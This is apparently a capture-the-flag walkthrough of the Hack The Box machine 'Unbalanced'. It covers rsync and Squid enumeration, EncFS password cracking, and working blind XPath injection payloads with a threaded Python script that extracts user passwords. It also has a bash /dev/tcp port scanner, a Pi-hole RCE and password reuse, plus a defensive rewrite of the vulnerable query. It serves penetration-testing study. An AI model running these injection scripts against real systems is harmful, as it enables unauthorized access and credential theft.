rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.
Setting Up SQUID Proxy in the browser
We have a SQUID proxy server running on port 3128. SQUID is normally used for filtering web traffic coming from the external network, i.e. the Internet. I will be using FoxyProxy to configure the browser to use it.
We don't really get anything, so we can proceed with Rsync Enumeration. Read about rsync over here.
Enumerating RSYNC Protocol
apt install rsync    # install the rsync client
Working with EncFS (FUSE-based cryptographic filesystem)
This directory consists of junk files and a .encfs6.xml file. EncFS is a cryptographic file system which encrypts all the files present in that directory. We need to know the password to decrypt all the files.
encfs ./encrypted_folder ./decrypt_data    # mounts a decrypted view of the directory at ./decrypt_data (password required)
We can use encfs2john.py to turn the .encfs6.xml file into a crackable hash and then crack it with John the Ripper.
Now that we have the password, we can decrypt it.
Analyzing squid.conf file
This one looks interesting, as we are allowed to access the intranet.unbalanced.htb domain. We also have the cache_mgr password here.
Cache Manager Access Control (SQUID)
This looks like a login portal for employees. I tried default usernames/passwords and also the previously found passwords, but didn't get anything. We do have the cache_mgr password, which means we can browse the internal Squid cache manager pages.
We can check FQDN (fully qualified domain name) Cache for potential IPs and hostnames.
The FQDN cache is a built-in component of squid providing Hostname to IP-Number translation functionality and managing the involved data-structures. ... The FQDN cache usually doesn't block on a request except for special cases where this is desired (see below).
These intranet-hostX.unbalanced.htb entries are probably the load balancers. A load balancer is a device that acts as a reverse proxy and distributes network or application traffic across a number of servers. Load balancers are used to increase the capacity (concurrent users) and reliability of applications.
Found a web page which can be vulnerable
Checking the IP addresses, I found this web page; it had been taken down due to security issues. (Looks interesting and may contain vulnerabilities.) Let's run a gobuster scan against this IP through the proxy.
gobuster dir --proxy http://10.10.10.200:3128/ -u http://172.31.179.1/ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt
This website is responsive; maybe we can try SQL injection on the login page. I tried sqlmap to automate the process but didn't get anything.
Exploiting XPATH Injection
This one looks like XPath injection. We can try injecting basic authentication-bypass payloads here.
This is definitely XPATH Injection. We can exploit this with a script to get all the usernames and passwords.
' or Username='rita' and string-length(Password/text())=num and ''=' // To extract the length
' or Username='rita' and substring(Password/text(),{},1)='a' and ''=' // To extract the password
#!/usr/bin/env python3
import requests
import threading
import time

url = "http://172.31.179.1/intranet.php"
# All requests go through the Squid proxy on the target
proxies = {'http': 'http://10.10.10.200:3128'}
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Referer": "http://172.31.179.1/intranet.php",
    "Origin": "http://172.31.179.1"
}
# Character set tried at every password position
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@$"
print(chars)
# users = ['bryan', 'rita', 'sarah', 'jim']


class myThread(threading.Thread):
    # One thread per user: find the password length, then each character
    def __init__(self, threadID, user):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.user = user

    def run(self):
        pass_length = length_extraction(self.user)
        if pass_length is None:
            print("[-] Could not determine password length for {}".format(self.user))
            return
        password = xpath_injection(self.user, pass_length)
        print("[+] Creds found for {} : {}".format(self.user, password))


def xpath_injection(user, length):
    # Blind extraction: the page echoes the username only when the predicate is true
    passwd = ""
    for i in range(1, length + 1):
        for char in chars:
            payload = {
                "Username": "admin",
                "Password": "' or Username='{}' and substring(Password/text(),{},1)='{}' and ''='".format(user, i, char)
            }
            resp = requests.post(url, data=payload, headers=headers, proxies=proxies)
            if user in resp.text:
                passwd += char
                break
    return passwd


def length_extraction(user):
    # Try lengths 0..29 until the true predicate makes the username appear
    for i in range(30):
        payload = {
            "Username": "admin",
            "Password": "' or Username='{}' and string-length(Password/text())={} and ''='".format(user, i)
        }
        resp = requests.post(url, data=payload, headers=headers, proxies=proxies)
        if user in resp.text:
            print("[+] Length found: {}".format(i))
            return i
    return None


starttime = time.asctime(time.localtime(time.time()))
print("[+] Script Started at {}".format(starttime))
# Extract credentials for each user in parallel
threads = [myThread(n, user) for n, user in enumerate(["bryan", "rita", "jim", "sarah"], 1)]
for t in threads:
    t.start()
for t in threads:
    t.join()
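The TODO list found later on the box says intranet-host3 was rewritten to fix this XPath vulnerability. As an added example (not from the original post and not the target's code), here is what such a rewrite has to achieve: the vulnerable query built by string concatenation, the same query with user input encoded as a single XPath literal via concat(), and a login() that keeps user input out of XPath entirely. The XML user store, the Users/User element names and the login() function are assumptions constructed for this example; PAYLOAD is the length-oracle payload from the post.

```python
import hmac
import xml.etree.ElementTree as ET

# Constructed sample user store in the shape the injection payloads imply
USERS_XML = """<Users>
  <User><Username>rita</Username><Password>s3cret</Password></User>
  <User><Username>bryan</Username><Password>hunter2</Password></User>
</Users>"""

# The blind-injection payload from the post (password-length oracle)
PAYLOAD = "' or Username='rita' and string-length(Password/text())=6 and ''='"


def vulnerable_query(username, password):
    """String concatenation: a quote in either field rewrites the predicate."""
    return "//User[Username='%s' and Password='%s']" % (username, password)


def xpath_literal(value):
    """Encode an arbitrary string as exactly one XPath 1.0 string literal.
    XPath has no escape character, so a value containing both quote kinds
    is split with concat(); whatever the input, the result can never add
    predicate logic to the query."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'%s'" % p for p in parts) + ")"


def safe_query(username, password):
    """Same query shape as above, but every user value is a literal."""
    return "//User[Username=%s and Password=%s]" % (
        xpath_literal(username), xpath_literal(password))


def login(username, password):
    """Preferred fix: select the user by iteration so input never reaches
    an XPath evaluator, and compare the secret in constant time."""
    root = ET.fromstring(USERS_XML)
    for user in root.findall("User"):
        if user.findtext("Username") == username:
            stored = user.findtext("Password") or ""
            return hmac.compare_digest(stored.encode(), password.encode())
    return False
```

The first approach is only a stopgap (the stored password is still compared inside the query); login() is the form a hardened intranet login should take.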
SSH Access as bryan user
# TODO list for the bryan user
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]
###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
Discovering Pi-Hole running on docker network
There's a Pi-hole running on the docker network. We need to find the IP address of that container; for that, we can use the ip neigh command.
172.31.11.3 - Pi-hole might be running on this IP. To check, we can scan its ports using a static nmap binary or a simple bash script. Pi-hole runs with ports 53 and 80 open by default.
#!/bin/bash
# Minimal TCP port scanner using bash's /dev/tcp pseudo-device (no nmap needed)
ip=$1
if [[ $# -eq 0 ]]; then
    echo "[-] Supply IP Address"
    exit 1
fi
for i in $(seq 1 65535); do
    # The redirection succeeds only if the TCP connect succeeds;
    # the subshell lets us silence the "Connection refused" errors
    if (echo 1 > /dev/tcp/$ip/$i) 2>/dev/null; then
        echo "[+] Port open: $i"
    fi
done
Or we can also use curl to get the root page.
Forwarding ports using SSH
Let's forward the ports to our machine.
Exploiting Pi-hole RCE (Version 4.3.2)
The TODO note said that the admin set a temporary password. I tried admin as the password and got authenticated. (Pi-hole version v4.3.2)
The MAC address input in this Pi-hole version can be exploited to gain arbitrary code execution on the container.
Reusing the admin interface password on the host machine gives root access.